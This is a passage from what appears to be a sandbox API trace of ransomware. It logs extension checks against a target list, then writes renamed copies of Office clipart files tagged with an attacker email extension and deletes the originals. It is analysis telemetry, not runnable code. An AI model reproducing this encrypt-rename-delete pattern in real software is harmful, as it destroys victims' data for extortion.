lpString2=".WMF") returned -1 [0070.714] lstrlenW (lpString=".7z") returned 3 [0070.715] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF") returned 68 [0070.715] lstrlenW (lpString=".dbf") returned 4 [0070.715] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF") returned 68 [0070.715] lstrlenW (lpString=".1cd") returned 4 [0070.715] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF") returned 68 [0070.715] lstrlenW (lpString=".jpg") returned 4 [0070.715] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.721] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.721] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103850.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0070.723] GetLastError () returned 0x0 [0070.723] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x5c2c, lpOverlapped=0x0) returned 1 [0070.774] WriteFile (in: hFile=0x36c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x5c30, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x5c30, lpOverlapped=0x0) returned 1 [0070.775] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.775] WriteFile (in: hFile=0x36c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.776] SetEndOfFile (hFile=0x36c) returned 1 [0070.776] CloseHandle (hObject=0x36c) returned 1 [0070.776] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.776] SetEndOfFile (hFile=0x340) returned 1 [0070.777] CloseHandle (hObject=0x340) returned 1 [0070.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.777] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103850.wmf")) returned 1 [0070.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF") returned 68 [0070.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF") returned 68 [0070.778] lstrlenW (lpString=".doc") returned 4 [0070.778] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.778] lstrlenW (lpString=".docx") returned 5 [0070.778] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0070.778] lstrlenW (lpString=".pdf") returned 4 [0070.778] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.778] lstrlenW (lpString=".xls") returned 4 [0070.778] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.778] lstrlenW (lpString=".xlsx") returned 5 [0070.778] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0070.778] lstrlenW (lpString=".ppt") returned 4 [0070.778] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF") returned 68 [0070.778] lstrlenW (lpString=".zip") returned 4 [0070.778] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.778] lstrlenW (lpString=".rar") returned 4 [0070.779] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.779] lstrlenW (lpString=".bz2") returned 4 [0070.779] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.779] lstrlenW (lpString=".7z") returned 3 [0070.779] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF") returned 68 [0070.779] lstrlenW (lpString=".dbf") returned 4 [0070.779] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF") returned 68 [0070.779] lstrlenW (lpString=".1cd") returned 4 [0070.779] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103850.WMF") returned 68 [0070.779] lstrlenW (lpString=".jpg") returned 4 [0070.779] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.780] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.780] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105238.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0070.780] GetLastError () returned 0x0 [0070.780] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x4314, lpOverlapped=0x0) returned 1 [0070.880] WriteFile (in: hFile=0x36c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x4320, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x4320, lpOverlapped=0x0) returned 1 [0071.087] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.087] WriteFile (in: hFile=0x36c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0071.087] SetEndOfFile (hFile=0x36c) returned 1 [0071.088] CloseHandle (hObject=0x36c) returned 1 [0071.088] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.088] SetEndOfFile (hFile=0x340) returned 1 [0071.089] CloseHandle (hObject=0x340) returned 1 [0071.089] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.089] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105238.wmf")) returned 1 [0071.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF") returned 68 [0071.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF") returned 68 [0071.089] lstrlenW (lpString=".doc") returned 4 [0071.089] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.089] lstrlenW (lpString=".docx") returned 5 [0071.089] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0071.089] lstrlenW (lpString=".pdf") returned 4 [0071.090] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.090] lstrlenW (lpString=".xls") returned 4 [0071.090] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.090] lstrlenW (lpString=".xlsx") returned 5 [0071.090] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0071.090] lstrlenW (lpString=".ppt") returned 4 [0071.090] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF") returned 68 [0071.090] lstrlenW (lpString=".zip") returned 4 [0071.090] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.090] lstrlenW (lpString=".rar") returned 4 [0071.090] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.090] lstrlenW (lpString=".bz2") returned 4 [0071.090] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.090] lstrlenW (lpString=".7z") returned 3 [0071.090] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF") returned 68 [0071.090] lstrlenW (lpString=".dbf") returned 4 [0071.090] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF") returned 68 [0071.090] lstrlenW (lpString=".1cd") returned 4 [0071.090] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105238.WMF") returned 68 [0071.090] lstrlenW (lpString=".jpg") returned 4 [0071.090] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.091] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.091] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105240.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0071.092] GetLastError () returned 0x0 [0071.092] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2d0c, lpOverlapped=0x0) returned 1 [0071.171] WriteFile (in: hFile=0x36c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2d10, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2d10, lpOverlapped=0x0) returned 1 [0071.172] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.172] WriteFile (in: hFile=0x36c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0071.172] SetEndOfFile (hFile=0x36c) returned 1 [0071.172] CloseHandle (hObject=0x36c) returned 1 [0071.172] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.172] SetEndOfFile (hFile=0x340) returned 1 [0071.173] CloseHandle (hObject=0x340) returned 1 [0071.173] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.173] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105240.wmf")) returned 1 [0071.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF") returned 68 [0071.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF") returned 68 [0071.174] lstrlenW (lpString=".doc") returned 4 [0071.174] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.174] lstrlenW (lpString=".docx") returned 5 [0071.174] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0071.174] lstrlenW (lpString=".pdf") returned 4 [0071.174] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.174] lstrlenW (lpString=".xls") returned 4 [0071.174] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.174] lstrlenW (lpString=".xlsx") returned 5 [0071.174] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0071.174] lstrlenW (lpString=".ppt") returned 4 [0071.174] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF") returned 68 [0071.175] lstrlenW (lpString=".zip") returned 4 [0071.175] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.175] lstrlenW (lpString=".rar") returned 4 [0071.175] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.175] lstrlenW (lpString=".bz2") returned 4 [0071.175] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.175] lstrlenW (lpString=".7z") returned 3 [0071.175] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF") returned 68 [0071.175] lstrlenW (lpString=".dbf") returned 4 [0071.175] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF") returned 68 [0071.175] lstrlenW (lpString=".1cd") returned 4 [0071.175] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105240.WMF") returned 68 [0071.175] lstrlenW (lpString=".jpg") returned 4 [0071.175] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.176] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.176] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105244.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0071.176] GetLastError () returned 0x0 [0071.176] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2bdc, lpOverlapped=0x0) returned 1 [0071.183] WriteFile (in: hFile=0x36c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2be0, lpOverlapped=0x0) returned 1 [0071.184] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.184] WriteFile (in: hFile=0x36c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0071.184] SetEndOfFile (hFile=0x36c) returned 1 [0071.184] CloseHandle (hObject=0x36c) returned 1 [0071.185] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.185] SetEndOfFile (hFile=0x340) returned 1 [0071.186] CloseHandle (hObject=0x340) returned 1 [0071.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.186] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105244.wmf")) returned 1 [0071.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF") returned 68 [0071.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF") returned 68 [0071.187] lstrlenW (lpString=".doc") returned 4 [0071.187] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.187] lstrlenW (lpString=".docx") returned 5 [0071.187] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0071.187] lstrlenW (lpString=".pdf") returned 4 [0071.187] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.187] lstrlenW (lpString=".xls") returned 4 [0071.187] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.187] lstrlenW (lpString=".xlsx") returned 5 [0071.187] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0071.187] lstrlenW (lpString=".ppt") returned 4 [0071.187] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF") returned 68 [0071.187] lstrlenW (lpString=".zip") returned 4 [0071.187] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.187] lstrlenW (lpString=".rar") returned 4 [0071.187] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.187] lstrlenW (lpString=".bz2") returned 4 [0071.187] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.187] lstrlenW (lpString=".7z") returned 3 [0071.187] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF") returned 68 [0071.187] lstrlenW (lpString=".dbf") returned 4 [0071.187] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF") returned 68 [0071.188] lstrlenW (lpString=".1cd") returned 4 [0071.188] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105244.WMF") returned 68 [0071.188] lstrlenW (lpString=".jpg") returned 4 [0071.188] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.188] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.189] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105250.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0071.189] GetLastError () returned 0x0 [0071.189] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1214, lpOverlapped=0x0) returned 1 [0071.555] WriteFile (in: hFile=0x36c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1220, lpOverlapped=0x0) returned 1 [0071.589] ReadFile (in: hFile=0x340, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0071.589] WriteFile (in: hFile=0x36c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0071.589] SetEndOfFile (hFile=0x36c) returned 1 [0071.589] CloseHandle (hObject=0x36c) returned 1 [0071.589] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.589] SetEndOfFile (hFile=0x340) returned 1 [0071.590] CloseHandle (hObject=0x340) returned 1 [0071.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0071.590] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105250.wmf")) returned 1 [0071.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF") returned 68 [0071.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF") returned 68 [0071.591] lstrlenW (lpString=".doc") returned 4 [0071.591] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0071.591] lstrlenW (lpString=".docx") returned 5 [0071.591] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0071.591] lstrlenW (lpString=".pdf") returned 4 [0071.591] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0071.591] lstrlenW (lpString=".xls") returned 4 [0071.591] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0071.591] lstrlenW (lpString=".xlsx") returned 5 [0071.591] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0071.592] lstrlenW (lpString=".ppt") returned 4 [0071.592] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0071.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF") returned 68 [0071.592] lstrlenW (lpString=".zip") returned 4 [0071.592] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0071.592] lstrlenW (lpString=".rar") returned 4 [0071.592] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0071.592] lstrlenW (lpString=".bz2") returned 4 [0071.592] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0071.592] lstrlenW (lpString=".7z") returned 3 [0071.592] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0071.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF") returned 68 [0071.592] lstrlenW (lpString=".dbf") returned 4 [0071.592] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0071.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF") returned 68 [0071.592] lstrlenW (lpString=".1cd") returned 4 [0071.592] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0071.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF") returned 68 [0071.592] lstrlenW (lpString=".jpg") returned 4 [0071.592] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0071.668] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.668] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105280.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105280.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0072.031] GetLastError () returned 0x0 [0072.031] ReadFile (in: hFile=0x308, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2d14, lpOverlapped=0x0) returned 1 [0072.349] WriteFile (hFile=0x390, 